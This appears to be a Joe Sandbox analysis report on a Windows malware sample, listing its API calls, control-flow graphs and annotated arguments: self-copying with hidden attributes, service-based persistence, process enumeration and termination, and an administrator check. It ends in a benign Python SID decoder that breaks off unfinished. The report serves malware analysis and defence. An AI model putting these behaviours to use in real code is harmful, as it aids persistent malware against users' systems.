  • Part of subcall function 00A45200: GetVersionExA.KERNEL32(00ABAE70), ref: 00A452CC
• Sleep.KERNEL32(00000D05), ref: 00A38B70
• Sleep.KERNELBASE(000007D0), ref: 00A38DAC
• GetModuleFileNameA.KERNEL32(00000000,?,00000200), ref: 00A38E86
• SetFileAttributesA.KERNEL32(?,00000080), ref: 00A38E9F
• CopyFileA.KERNEL32(?,?,00000000), ref: 00A38EC3
• SetFileAttributesA.KERNEL32(?,00000002), ref: 00A3912B
• SetFileAttributesA.KERNEL32(?,00000080), ref: 00A39186
• GetCommandLineA.KERNEL32 ref: 00A39265
• GetModuleFileNameA.KERNEL32(00000000,?), ref: 00A39370
  • Part of subcall function 00A3A4E0: lstrlen.KERNEL32(?), ref: 00A3A4FE
  • Part of subcall function 00A3D500: lstrlen.KERNEL32(?,?,00A3D630,?), ref: 00A3D523
• MessageBoxA.USER32(00000000,00000004,00000005,?), ref: 00A396D4
• CloseHandle.KERNEL32(00000000), ref: 00A39AC8
• SetFileAttributesA.KERNEL32(?,00000080), ref: 00A39AEC
• CopyFileA.KERNEL32(?,?,00000000), ref: 00A39B0C
• SetFileAttributesA.KERNEL32(?,00000002), ref: 00A39B3B
• Sleep.KERNEL32(000003E8), ref: 00A39C52
• Sleep.KERNELBASE(000003E8), ref: 00A38CB2
  • Part of subcall function 00A3BBC0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00A3BC90
  • Part of subcall function 00A3BBC0: Process32First.KERNEL32(00000000,?), ref: 00A3BCE3
• GetCommandLineA.KERNEL32 ref: 00A386AE
  • Part of subcall function 00A32800: ExitProcess.KERNEL32 ref: 00A32842
  • Part of subcall function 00A608B0: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00A60929
  • Part of subcall function 00A608B0: __aulldiv.LIBCMT ref: 00A60953
• Sleep.KERNEL32(000007D0), ref: 00A39E32
• SetFileAttributesA.KERNEL32(00A7D800,00000080), ref: 00A39E88
• CopyFileA.KERNEL32(?,00A7D800,00000000), ref: 00A39EA6
• SetFileAttributesA.KERNEL32(00A7D800,00000002), ref: 00A39EC5
  • Part of subcall function 00A40500: OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 00A40537
  • Part of subcall function 00A40500: CreateServiceA.ADVAPI32(00000000,00F7E6B0,00F7E6B0,000F01FF,00000110,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00A40596
  • Part of subcall function 00A40500: ChangeServiceConfig2A.ADVAPI32(00000000,00000001,?), ref: 00A40615
  • Part of subcall function 00A40500: StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00A4062A
• CreateThread.KERNEL32(00000000,00000000,Function_000222A0,00000000,00000000,00000000), ref: 00A3A26A
• Sleep.KERNEL32(0000C350), ref: 00A3A327
Strings
Memory Dump Source
• Source File: 00000005.00000002.2077154991.0000000000A31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A30000, based on PE: true
• Associated: 00000005.00000002.2077138911.0000000000A30000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077181409.0000000000A67000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077201160.0000000000A6C000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077201160.0000000000AA9000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077201160.0000000000ABA000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077261874.0000000000ABB000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_a30000_amdrhfskpcu.jbxd
Similarity
• API ID: File$Attributes$CreateSleep$CopyMutexService$CommandLineModuleNameTimelstrlen$ChangeCloseConfig2CountEnvironmentExitFirstHandleManagerMessageOpenProcessProcess32SnapshotStartSystemThreadTickToolhelp32VariableVersion__aulldiv
• String ID: zS$%Tmd$C:\Windows\system32\config\systemprofile$@L$}en
• API String ID: 2964372999-1718768463
• Opcode ID: 0783e844ac88657a94db2c5da09d83c4cb248c0cca2a7ec78a59e9604986e705
                                                                                                                                                                                                            • Instruction ID: a2a12dc258a8578df2b07ac1a53681734985336260cf234bf1cefaef442085ed
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0783e844ac88657a94db2c5da09d83c4cb248c0cca2a7ec78a59e9604986e705
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9C230471A00302DFD704EFE4FD8A6663BB4FB95341F11861AE14A962B6EB7448A3CF51

Control-flow Graph
• Graph for the function at 00A45200 (rendered as an image in the original; the serialized node and edge list is not reproduced here). Legend: Executed / Not Executed. Every Win32 call that appears in the graph's blocks (GetVersionExA, CreateDirectoryA, DeleteFileA, RemoveDirectoryA, GetTempPathA, SetFileAttributesA) is also in the APIs list below.
APIs
• GetVersionExA.KERNEL32(00ABAE70), ref: 00A452CC
• CreateDirectoryA.KERNELBASE(0000005C,00000000), ref: 00A4549F
• DeleteFileA.KERNELBASE(?), ref: 00A456FE
• RemoveDirectoryA.KERNELBASE(00000000), ref: 00A45743
• CreateDirectoryA.KERNELBASE(?,00000000), ref: 00A4583A
• CreateDirectoryA.KERNELBASE(?,00000000), ref: 00A458F3
• CreateDirectoryA.KERNEL32(?,00000000), ref: 00A45D71
• CreateDirectoryA.KERNEL32(?,00000000), ref: 00A45E82
• GetTempPathA.KERNEL32(00000104,?), ref: 00A46029
• CreateDirectoryA.KERNEL32(?,00000000), ref: 00A461FF
• GetTempPathA.KERNEL32(00000104,?), ref: 00A463DE
• SetFileAttributesA.KERNELBASE(?,00000002), ref: 00A4655F
Strings
Memory Dump Source
• Source File: 00000005.00000002.2077154991.0000000000A31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A30000, based on PE: true
• Associated: the same six memory regions listed for the preceding function
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_a30000_amdrhfskpcu.jbxd
Similarity
• API ID: Directory$Create$FilePathTemp$AttributesDeleteRemoveVersion
• String ID: C:\Windows\system32\config\systemprofile$C:\whfkpbh\$\$aE'P$r9:
• API String ID: 1691758827-2593203275
• Opcode ID: 62caa11a9e2060968d82e3a696ad758f0aaf8b43382329be7bca47d1823dbf3c
• Instruction ID: 2c96d200c69962e61b844d1e3b72e8e099aba07f43bd0043a4d9982b556e2def
• Opcode Fuzzy Hash: 62caa11a9e2060968d82e3a696ad758f0aaf8b43382329be7bca47d1823dbf3c
• Instruction Fuzzy Hash: E6A267B6A00202DFC704DFE4FD866B637B0F795310B018629E546962F6EB7488A7CF55

Control-flow Graph
• Graph for the function at 00A3BBC0 (rendered as an image in the original; the serialized node and edge list is not reproduced here). Legend: Executed / Not Executed. The graph shows a loop over a Toolhelp32 process snapshot: block 00A3BC8C calls CreateToolhelp32Snapshot, 00A3BCBB calls Process32First, 00A3BDBB calls OpenProcess, 00A3BE02 calls TerminateProcess, 00A3BE67 and 00A3BF1A call CloseHandle, and 00A3BEDD calls Process32Next before looping back to 00A3BD10. TerminateProcess, Process32Next and CloseHandle appear only in the graph, not in the APIs list below.
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00A3BC90
• Process32First.KERNEL32(00000000,?), ref: 00A3BCE3
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A3BDDD
Memory Dump Source
• Source File: 00000005.00000002.2077154991.0000000000A31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A30000, based on PE: true
• Associated: the same six memory regions listed for the first function above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_a30000_amdrhfskpcu.jbxd
Similarity
• API ID: CreateFirstOpenProcessProcess32SnapshotToolhelp32
• String ID:
• API String ID: 3397401024-0
• Opcode ID: 7ff895f26800880b000775b91c1f49ac2e5023c49fe0ddecf5c347cedb1cfaf0
• Instruction ID: 37c59a9f99e81d822ce26ec8cf89c931651ab7c52b21601042ee485fa495e204
• Opcode Fuzzy Hash: 7ff895f26800880b000775b91c1f49ac2e5023c49fe0ddecf5c347cedb1cfaf0
• Instruction Fuzzy Hash: D89123B6A10202CFC704DFE8FC99AAA37B5FB98310F15811AE505972B1DB788997CF54

Control-flow Graph
• Graph for the function at 00A41530 (rendered as an image in the original; the serialized node and edge list is not reproduced here). Legend: Executed / Not Executed. Blocks in address order: 00A4157F calls CreateFileA, 00A41673 calls GetFileTime, 00A41694 calls CloseHandle on the failure path, 00A416BF calls the internal routine at 00A65E60, and 00A41771 calls GetFileSize then CloseHandle. All of these appear in the APIs list below.
APIs
• CreateFileA.KERNELBASE(?,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00A415C3
• GetFileTime.KERNEL32(00000000,?,?,?), ref: 00A4168A
• CloseHandle.KERNEL32(00000000), ref: 00A416A7
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A41715
• GetFileSize.KERNEL32(00000000,00000000,2AC18000,FE624E21,00989680,00000000), ref: 00A41774
• CloseHandle.KERNEL32(00000000), ref: 00A41792
Memory Dump Source
• Source File: 00000005.00000002.2077154991.0000000000A31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A30000, based on PE: true
• Associated: the same six memory regions listed for the first function above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_a30000_amdrhfskpcu.jbxd
Similarity
• API ID: File$CloseHandle$CreateSizeTimeUnothrow_t@std@@@__ehfuncinfo$??2@
• String ID:
• API String ID: 3236713533-0
• Opcode ID: 0ce10a2caef4782c700173dca69e920874a21eae7d0a0e282ac50b800be46bde
• Instruction ID: 73920238fc919d22c3cdbb1fe34d81c4edb629e2df67584089582fab6d3ece12
• Opcode Fuzzy Hash: 0ce10a2caef4782c700173dca69e920874a21eae7d0a0e282ac50b800be46bde
• Instruction Fuzzy Hash: C271F071A01206EFC700DFE9FC85676BBB4FB8A710F11861AE449922B5E77548A7CF44

Control-flow graph (rendered as an image in the original, with executed and not-executed blocks marked). Structure: a loop headed at a3bd10 whose tail calls Process32Next (a3bedd, back-edge to a3bd10); each iteration calls OpenProcess (a3bdbb), TerminateProcess (a3be02) and CloseHandle (a3be67) on the process handle; when Process32Next fails, the snapshot handle is closed (CloseHandle at a3bf19) and the function returns.
• control_flow_graph 765 a3bd08-a3bd0f 766 a3bd10-a3bd56 call a313e0 765->766 769 a3bd80-a3bdb5 call a3a4e0 call a5b260 766->769 770 a3bd58-a3bd74 766->770 776 a3bdbb-a3bdfc OpenProcess 769->776 777 a3beb9-a3bed1 769->777 770->769 771 a3bd76 770->771 771->769 780 a3bea3-a3beb2 776->780 781 a3be02-a3be48 TerminateProcess 776->781 778 a3bed3 777->778 779 a3bedd-a3bf13 Process32Next 777->779 778->779 779->766 784 a3bf19-a3bf86 CloseHandle call a5a7e0 779->784 780->777 782 a3be67-a3be89 CloseHandle 781->782 783 a3be4a-a3be61 781->783 782->780 785 a3be8b-a3be9d 782->785 783->782 785->780
                                                                                                                                                                                                            APIs
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A3BDDD (dwDesiredAccess = 0x1 = PROCESS_TERMINATE, bInheritHandle = FALSE: the only right requested is the one TerminateProcess needs)
• TerminateProcess.KERNELBASE(00000000,000000FF), ref: 00A3BE24 (uExitCode = 0xFF)
• CloseHandle.KERNEL32(00000000), ref: 00A3BE68 (closes the process handle opened above)
• Process32Next.KERNEL32(00000000,00000128), ref: 00A3BF01 (dwSize = 0x128 = 296 = sizeof(PROCESSENTRY32) for the ANSI 32-bit structure, so the snapshot is walked with the narrow API)
• CloseHandle.KERNEL32(00000000), ref: 00A3BF2F (closes the snapshot handle once the loop ends)
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000005.00000002.2077154991.0000000000A31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A30000, based on PE: true
• Associated: 00000005.00000002.2077138911.0000000000A30000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077181409.0000000000A67000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077201160.0000000000A6C000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077201160.0000000000AA9000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077201160.0000000000ABA000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077261874.0000000000ABB000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_a30000_amdrhfskpcu.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseHandleProcess$NextOpenProcess32Terminate
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3173823348-0
                                                                                                                                                                                                            • Opcode ID: 4f0d1cdcedccbe76f6ded1fe79bd689d2d999f101a75dd60c96dcef4bcbe41b3
                                                                                                                                                                                                            • Instruction ID: 7b56230b5e0ed75174e27f8e116c4c2f3a736ac4ae110ba8c4b8edac1a60a86f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f0d1cdcedccbe76f6ded1fe79bd689d2d999f101a75dd60c96dcef4bcbe41b3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D510F76A11202DFC704DFE4FC95AAA37B5FB98315F15811AE50A872B0EB348987CB50

Control-flow graph (rendered as an image in the original, with executed and not-executed blocks marked). Structure: straight-line argument setup, CreateProcessA at a5fb20, then on one return path two CloseHandle calls (a5fbff), the usual release of the PROCESS_INFORMATION process and thread handles, and on the other a direct exit (a5fc8f).
• control_flow_graph 790 a5fa80-a5faa8 791 a5fabe-a5fadf 790->791 792 a5faaa-a5fab7 790->792 793 a5fae1-a5fafe 791->793 794 a5fb00-a5fb19 791->794 792->791 795 a5fb20-a5fbf9 call a5a7e0 * 2 CreateProcessA 793->795 794->795 800 a5fc8f-a5fcb3 795->800 801 a5fbff-a5fc8e CloseHandle * 2 795->801
                                                                                                                                                                                                            APIs
• CreateProcessA.KERNELBASE(?,00A4ED48,00000000,00000000,00000000,00000008,00000000,00000000,00000044,?,?,?,?,?,?,00000000), ref: 00A5FBF1 (lpCommandLine points into the image at 0xA4ED48, bInheritHandles = FALSE, dwCreationFlags = 0x8 = DETACHED_PROCESS, so the child gets no console from the parent; the 0x44 shown in the STARTUPINFO slot is sizeof(STARTUPINFOA) = 68, the cb field)
• CloseHandle.KERNEL32(00A4ED48,?,?,?,?,?,00000000), ref: 00A5FC2F (the 0xA4ED48 shown here is almost certainly the command-line pointer still on the stack, not a handle value)
• CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00A5FC58
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000005.00000002.2077154991.0000000000A31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A30000, based on PE: true
• Associated: 00000005.00000002.2077138911.0000000000A30000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077181409.0000000000A67000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077201160.0000000000A6C000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077201160.0000000000AA9000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077201160.0000000000ABA000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077261874.0000000000ABB000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_a30000_amdrhfskpcu.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseHandle$CreateProcess
• String ID: D (the single byte 0x44 = 'D', i.e. the STARTUPINFOA.cb value, picked up by the string scanner)
                                                                                                                                                                                                            • API String ID: 2922976086-2746444292
                                                                                                                                                                                                            • Opcode ID: 033bfb43cdac20b4b9b06e7148d736cbf6a62fcd8b3ce9a351e39c515733d92c
                                                                                                                                                                                                            • Instruction ID: a1b31a5481abf9eaa3a7a8f88c57dda38a80ca55ed8cec0b440ec99d20baaaf7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 033bfb43cdac20b4b9b06e7148d736cbf6a62fcd8b3ce9a351e39c515733d92c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2510E31A11206EBD704DFE4FC427AA3BF4FB49711F00812AE44A962B0EBB45497CB85

Control-flow graph (rendered as an image in the original, with executed and not-executed blocks marked). Structure: CreateToolhelp32Snapshot at a42196 (failure goes straight to the exit at a424b9), Process32First at a4224f, then a loop over the entries whose tail calls Process32Next (a42346, back-edge to a42280); when the snapshot is exhausted the handle is closed at a4240d (the call is labelled FindCloseChangeNotification, which in kernel32/kernelbase resolves to the same code as CloseHandle).
• control_flow_graph 802 a42120-a4218a 803 a42196-a421f8 CreateToolhelp32Snapshot 802->803 804 a4218c 802->804 805 a421fe-a42239 803->805 806 a424b9-a424fd call a5a7e0 803->806 804->803 808 a4224f-a42274 Process32First 805->808 809 a4223b-a42248 805->809 811 a4240d-a4244e FindCloseChangeNotification 808->811 812 a4227a 808->812 809->808 814 a42450-a42469 811->814 815 a4246b-a42497 811->815 813 a42280-a42292 812->813 816 a42294-a422a0 813->816 817 a422a6-a422ce call a313e0 813->817 814->806 815->806 818 a42499-a424b2 815->818 816->817 821 a422d0-a422e6 817->821 822 a4230f 817->822 818->806 823 a42319-a42320 call a3a4e0 821->823 824 a422e8-a4230d 821->824 822->823 826 a42325-a42344 call a5b260 823->826 824->823 829 a42346-a42396 Process32Next 826->829 830 a4239e-a423ac 826->830 829->813 831 a4239c 829->831 832 a423d2-a42401 830->832 833 a423ae-a423cc 830->833 831->811 832->811 834 a42403 832->834 833->832 834->811
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00A421D0 (dwFlags = 0x2 = TH32CS_SNAPPROCESS, th32ProcessID = 0: a snapshot of every process on the system)
• Process32First.KERNEL32(00000000,00000128), ref: 00A42257 (dwSize = 0x128 = sizeof(PROCESSENTRY32), ANSI, 32-bit)
• Process32Next.KERNEL32(00000000,00000128), ref: 00A42384
• FindCloseChangeNotification.KERNELBASE(00000000), ref: 00A42426 (closes the snapshot handle; this export shares its address with CloseHandle, so the name is a resolver artefact, not a change-notification object)
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000005.00000002.2077154991.0000000000A31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A30000, based on PE: true
• Associated: 00000005.00000002.2077138911.0000000000A30000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077181409.0000000000A67000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077201160.0000000000A6C000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077201160.0000000000AA9000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077201160.0000000000ABA000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077261874.0000000000ABB000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_a30000_amdrhfskpcu.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3243318325-0
                                                                                                                                                                                                            • Opcode ID: 04b3df3ff69ba08359e638bfbb9750729ad294c79ec897ed2c0813eb1358b969
                                                                                                                                                                                                            • Instruction ID: bdfa29c3537afa85fd9fbf8e1d91d230705cb31a1856d367db9cc8c7d90c9842
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 04b3df3ff69ba08359e638bfbb9750729ad294c79ec897ed2c0813eb1358b969
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8F910175A00212CFD300DFE5FC887A63BB4FBA5350F45811AE846962B5EBB484A7CF65

Control-flow graph (rendered as an image in the original, with executed and not-executed blocks marked). Structure: the function first calls a53110 (the WaitForSingleObject wrapper), then CreateFileA at a41e4c; on success it loops over WriteFile (a41f8b, back-edge to a41f20) and closes the file at a42069 (labelled FindCloseChangeNotification, the same code as CloseHandle); a5fcc0 (the ReleaseMutex wrapper) is reached on every exit path, including the early exit at a41e23 and the CreateFileA failure path at a41e93.
• control_flow_graph 835 a41d90-a41e21 call a65df0 call a53110 840 a41e23-a41e4b call a5fcc0 835->840 841 a41e4c-a41e91 CreateFileA 835->841 843 a41ed1-a41ef0 841->843 844 a41e93-a41ed0 call a5fcc0 841->844 846 a41ef2-a41f06 843->846 847 a41f0c-a41f18 843->847 846->847 850 a41f20-a41f3e 847->850 851 a41f40-a41f57 850->851 852 a41f59-a41f85 850->852 853 a41f8b-a42063 call a3b620 call a5ff30 WriteFile 851->853 852->853 853->850 858 a42069-a4209c FindCloseChangeNotification call a5fcc0 853->858 860 a420a1-a420b6 858->860 861 a420c2-a420ca 860->861 862 a420b8 860->862 862->861
APIs
  • Part of subcall function 00A53110: WaitForSingleObject.KERNEL32(?,00004E20,?,00A3D0F2,00000124), ref: 00A531AD (dwMilliseconds = 0x4E20 = 20000: a bounded 20 s wait before the write, paired with the ReleaseMutex below)
• CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00A41E7B (dwDesiredAccess = 0x40000000 = GENERIC_WRITE, dwShareMode = 0 (exclusive), no security attributes, dwCreationDisposition = 2 = CREATE_ALWAYS: the target file is created or truncated and then filled by the WriteFile loop in the graph)
  • Part of subcall function 00A5FCC0: ReleaseMutex.KERNEL32(00A3D410,?,00A3D410,00000124), ref: 00A5FCE9 (released on every exit path of the function, so the wait/release pair brackets the whole write)
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000005.00000002.2077154991.0000000000A31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A30000, based on PE: true
• Associated: 00000005.00000002.2077138911.0000000000A30000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077181409.0000000000A67000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077201160.0000000000A6C000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077201160.0000000000AA9000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077201160.0000000000ABA000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077261874.0000000000ABB000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_a30000_amdrhfskpcu.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateFileMutexObjectReleaseSingleWait
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1564016613-0
                                                                                                                                                                                                            • Opcode ID: 3cc83534d6ca5f84a5db8fe4ddfcae365e3d4abd800437ea6ec0d9947994cffe
                                                                                                                                                                                                            • Instruction ID: 107a3564fe7ee5614e34130f0c0209cc3ea7b1d8c300cdc4a29cdb7bb77d90bc
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3cc83534d6ca5f84a5db8fe4ddfcae365e3d4abd800437ea6ec0d9947994cffe
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 27712376611205DFC704CFE8FC8AA6A37B4FB99305F018219E909976B2DB7498A7CF41

Control-flow graph (rendered as an image in the original, with executed and not-executed blocks marked). Structure: AllocateAndInitializeSid at a3b7a0; if the SID is built, CheckTokenMembership at a3b86a with the result handled in a3b887/a3b8b4; a3b8ee is the common exit, reached directly when SID allocation fails.
• control_flow_graph 863 a3b7a0-a3b84c AllocateAndInitializeSid 864 a3b861-a3b864 863->864 865 a3b84e-a3b85b 863->865 866 a3b86a-a3b885 CheckTokenMembership 864->866 867 a3b8ee-a3b90e 864->867 865->864 868 a3b887-a3b8ae 866->868 869 a3b8b4-a3b8e8 866->869 868->869 869->867
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00A3B82B
                                                                                                                                                                                                            • CheckTokenMembership.KERNELBASE(00000000,?,?), ref: 00A3B87D
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000005.00000002.2077154991.0000000000A31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077138911.0000000000A30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077181409.0000000000A67000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000A6C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000AA9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000ABA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077261874.0000000000ABB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_a30000_amdrhfskpcu.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AllocateCheckInitializeMembershipToken
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1663163955-0
                                                                                                                                                                                                            • Opcode ID: cb2320dfd7dded724d60044db2bdce2d785148f283502e6ecd8397e4bcd9c598
                                                                                                                                                                                                            • Instruction ID: ca3dcf391744184f04991b07ae794c925df5099c58c7547d04ad524cf781e432
                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb2320dfd7dded724d60044db2bdce2d785148f283502e6ecd8397e4bcd9c598
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F331EF75901249EFE704CFF4ED999BA7BB8FB4A300B00815EE402972B2D7B05997DB61
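The two APIs logged for this function are the standard Windows "is the caller an administrator" check: AllocateAndInitializeSid with nSubAuthorityCount = 2 and sub-authorities 0x20 (SECURITY_BUILTIN_DOMAIN_RID) and 0x220 (DOMAIN_ALIAS_RID_ADMINS) builds the BUILTIN\Administrators SID S-1-5-32-544, and CheckTokenMembership with a NULL TokenHandle tests the calling thread's token against it. The identifier-authority argument is logged only as a pointer ("?"), so SECURITY_NT_AUTHORITY (5) is an assumption here. Under UAC a non-elevated administrator's filtered token carries this group as deny-only, so the check returns FALSE until the process is elevated, which is why such a function is often followed by an elevation attempt. The Python below is an added example (not code from the sample or from Joe Sandbox) that turns the logged argument list into the SID string, looks it up in a small constructed table of well-known SIDs, and round-trips the SID through the binary layout AllocateAndInitializeSid produces, which is the form you would carve out of the memory dumps listed below:

```python
"""
Decode the SID built by the AllocateAndInitializeSid call logged in the
report above, render it as S-1-..., and serialise it to the binary form
Windows keeps in memory.

Added example; not code from the sample or from Joe Sandbox. The
identifier authority is only logged as a pointer, so SECURITY_NT_AUTHORITY
(5) is assumed.
"""
import struct

SECURITY_NT_AUTHORITY = 5  # assumed authority for the '?' argument

# Constructed lookup of well-known SIDs; not exhaustive.
WELL_KNOWN_SIDS = {
    "S-1-5-32-544": "BUILTIN\\Administrators",
    "S-1-5-32-545": "BUILTIN\\Users",
    "S-1-5-18": "NT AUTHORITY\\SYSTEM",
    "S-1-16-12288": "Mandatory Label\\High Mandatory Level",
}


def sid_from_allocate_args(authority, count, subauths):
    """Mirror AllocateAndInitializeSid: use the first `count` of the eight
    sub-authority slots and format the SID as S-1-<authority>-<subs...>."""
    if not 1 <= count <= 8:
        raise ValueError("nSubAuthorityCount must be 1..8")
    subs = [int(s) for s in list(subauths)[:count]]
    return "S-1-" + "-".join(str(x) for x in [authority] + subs)


def sid_to_bytes(sid):
    """Serialise a textual SID in the in-memory layout: revision (1),
    sub-authority count, 6-byte big-endian identifier authority, then
    little-endian 32-bit sub-authorities."""
    parts = sid.split("-")
    if parts[0] != "S" or parts[1] != "1":
        raise ValueError("unsupported SID revision")
    authority = int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (bytes([1, len(subs)])
            + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def sid_from_bytes(blob):
    """Inverse of sid_to_bytes, for SIDs carved out of a memory dump."""
    if len(blob) < 8 or blob[0] != 1:
        raise ValueError("not a revision-1 SID")
    count = blob[1]
    if len(blob) < 8 + 4 * count:
        raise ValueError("truncated SID")
    authority = int.from_bytes(blob[2:8], "big")
    subs = struct.unpack("<%dI" % count, blob[8:8 + 4 * count])
    return "S-1-" + "-".join(str(x) for x in (authority,) + subs)


def describe_sid(sid):
    return WELL_KNOWN_SIDS.get(sid, "(not a well-known SID)")


def decode_logged_call(log_line, assumed_authority=SECURITY_NT_AUTHORITY):
    """Parse the sandbox's 'AllocateAndInitializeSid.ADVAPI32(...)' argument
    list (hex values, '?' for pointers) into a SID string and a name.
    Argument 0 is a pointer to a SID_IDENTIFIER_AUTHORITY struct, so the
    authority value itself is never in the log; it is taken from
    assumed_authority."""
    inner = log_line[log_line.index("(") + 1:log_line.rindex(")")]
    args = [a.strip() for a in inner.split(",")]
    count = int(args[1], 16)
    subs = [int(a, 16) for a in args[2:10]]   # the eight sub-authority slots
    sid = sid_from_allocate_args(assumed_authority, count, subs)
    return sid, describe_sid(sid)


if __name__ == "__main__":
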